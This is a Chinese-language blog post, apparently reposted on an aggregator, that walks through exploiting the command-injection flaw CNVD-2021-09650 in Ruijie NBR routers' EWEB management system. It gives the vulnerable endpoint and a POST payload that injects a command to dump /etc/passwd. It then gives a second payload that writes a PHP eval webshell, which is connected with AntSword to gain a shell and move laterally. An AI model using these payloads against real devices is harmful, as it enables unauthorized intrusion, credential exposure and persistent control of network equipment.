锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

Posted BeeN & CCPX

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell相关的知识,希望对你有一定的参考价值。

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
漏洞编号:
CNVD-2021-09650

漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

漏洞影响:
锐捷NBR路由器 EWEB网关系统

漏洞复现:

首先打开网关系统

然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt

接着我们访问url/test.txt 路径,查看文件。

回显了/etc/passwd路径下passwd文件的内容

利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

漏洞复现:

Payload :
mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php

将这句话execute一下。

然后我们直接上蚁剑连接就ok了

这边直接能看到我们上传的webshell

右击终端

然后就可以进一步的横向或者纵向,也可以进一步信息收集。

博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!

以上是关于锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell的主要内容,如果未能解决你的问题,请参考以下文章

请问一下锐捷NBR路由器配置文件的问题?

锐捷路由器漏洞分析

NBR系列锐捷路由器怎么设置实现上网功能

锐捷 Smartweb管理系统 命令执行漏洞

锐捷 Smartweb管理系统 命令执行漏洞

NETCORE交换机和锐捷NBR2000交换机那个好?